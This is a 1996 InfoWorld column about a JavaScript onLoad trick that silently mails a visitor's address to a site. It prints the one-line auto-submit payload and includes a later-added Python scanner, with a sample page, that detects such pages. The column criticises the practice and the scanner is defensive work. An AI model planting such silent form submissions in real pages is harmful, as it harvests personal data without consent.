March 4, 1996
How JavaScript uses the Web to scam your E-mail
JavaScript, the new scripting language supported by Internet browsers such as Netscape Communications Corp.'s Navigator 2.0, provides a command that can be used to secretly obtain your E-mail address whenever you merely look at a page on the World Wide Web.
With little more than a single line of code, Web site administrators can quietly obtain all the information they need to begin sending you quantities of junk E-mail. The implications for personal privacy -- always a concern on the wide-open Internet -- need to be seriously considered by the computer industry.
A warning about this problem has been sounded by Glenn Fleishman of the Point of Presence Co. (Popco), in Seattle. Popco is a Web site developer and "content-hosting service" that creates Web pages.
Fleishman has created a Web page that illustrates the problem. When you set your browser to view the following page, http://www.popco.com/grabtest.html, the site automatically retrieves your E-mail address from any properly configured Netscape Navigator or compatible browser.
Sure enough, when I visited this site, I received a confirming E-mail message within minutes.
The JavaScript command that accomplishes this bit of scamming is simplicity itself. As part of the body of any Web page, the command causes a blank E-mail message, using a dummy "mailme" form, to be sent:
<BODY onLoad="document.mailme.submit()">
This transmits information for the Web provider to capture your E-mail address, which is part of the blank message's header.
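A way to check a saved page for this pattern, as an added example that is not part of the original column or of Fleishman's code: it flags a form that is submitted from an onLoad/onUnload handler or an inline script rather than by the visitor. It assumes the dummy form's ACTION is a mailto: URL; the function names, sample pages and addresses are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# document.<name>.submit() or document.forms[...].submit()
SUBMIT_RE = re.compile(r"document\.(?:forms\[[^\]]+\]|(\w+))\.submit\s*\(", re.I)
AUTO_EVENTS = {"onload", "onunload"}  # handlers that fire without a user action

class Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.mailto_forms = {}   # form name -> mailto: action (assumed mechanism)
        self.submits = []        # (trigger, form name or None)
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}  # names arrive lowercased
        if tag == "form" and a.get("action", "").lower().startswith("mailto:"):
            self.mailto_forms[a.get("name", "")] = a["action"]
        for event in AUTO_EVENTS & a.keys():
            self.submits += [(f"{tag} {event}", m.group(1)) for m in SUBMIT_RE.finditer(a[event])]
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:  # heuristic: any submit() call found in inline script text
            self.submits += [("script", m.group(1)) for m in SUBMIT_RE.finditer(data)]

def find_silent_mail_submits(html):
    """Return mailto: forms that the page submits without the visitor acting."""
    s = Scanner()
    s.feed(html)
    s.close()
    findings = []
    for trigger, name in s.submits:
        # document.forms[...] carries no name, so report it against every mailto: form
        for target in ([name] if name is not None else list(s.mailto_forms)):
            if target in s.mailto_forms:
                findings.append({"trigger": trigger, "form": target, "action": s.mailto_forms[target]})
    return findings

# Constructed sample pages: one auto-submits on load, one waits for the visitor to click Send.
SUSPECT = """<HTML><BODY onLoad="document.mailme.submit()">
<FORM NAME="mailme" METHOD="POST" ACTION="mailto:collector@example.invalid"></FORM>
Welcome!</BODY></HTML>"""
BENIGN = """<HTML><BODY><FORM NAME="feedback" METHOD="POST" ACTION="mailto:webmaster@example.invalid">
<INPUT TYPE="text" NAME="comment"><INPUT TYPE="submit" VALUE="Send"></FORM></BODY></HTML>"""

if __name__ == "__main__":
    for label, page in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, find_silent_mail_submits(page))
```

The second sample page is not flagged because its mail form is sent only when the visitor presses the button, which is the informed choice the column argues for.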
You may think I'm revealing some horrible secret that would be better left unsaid. You can rest assured that this new feature has been a hot topic on the Internet Marketing Discussion List (http://www.i-m.com), a dialogue on ways to use the 'net to reach customers.
Of the 6,500 or so recipients of the marketing list, more than 750 addresses of visitors have already been recorded by Fleishman's demo page. And that's only in the five days that the page has been available (as of press time). Using Navigator, anyone can click View, Document Source and save a copy of the 10 lines of sample code Fleishman has developed. The word is out.
Of course, it's easy to defeat this little piece of code. Your E-mail information is derived from the user configuration file maintained by Navigator and other browser software. When you set up Navigator 2.0, it asks you to enter this information so you can send E-mail messages during your Web surfing. (Some browsers, including Microsoft Internet Explorer 2.0, don't yet support these features, so the "onLoad" command does nothing.) If you enter a bogus E-mail address or mail-server name in your configuration, the "onLoad" command is beaten. Unfortunately, using bogus data interferes with your legitimate E-mail use, so it's not the best solution.
In my opinion, it is unethical for commercial entities to collect personal information without informing the affected persons and allowing them to decide whether or not to submit it. Fleishman has done us a service by bringing this capability to our attention, so the computer industry can develop guidelines for privacy. This is a situation where self-regulation would help prevent more heavy-handed governmental intervention.
Glenn Fleishman receives a free copy of Windows 95 Secrets for sending me a tip about this development.
Brian Livingston is the coauthor of the new Windows 95 Secrets and author of three other Windows books (IDG Books). Send tips to brian_livingston@infoworld.com or fax: (206) 282-1248.
Copyright © 1996 by InfoWorld Publishing Company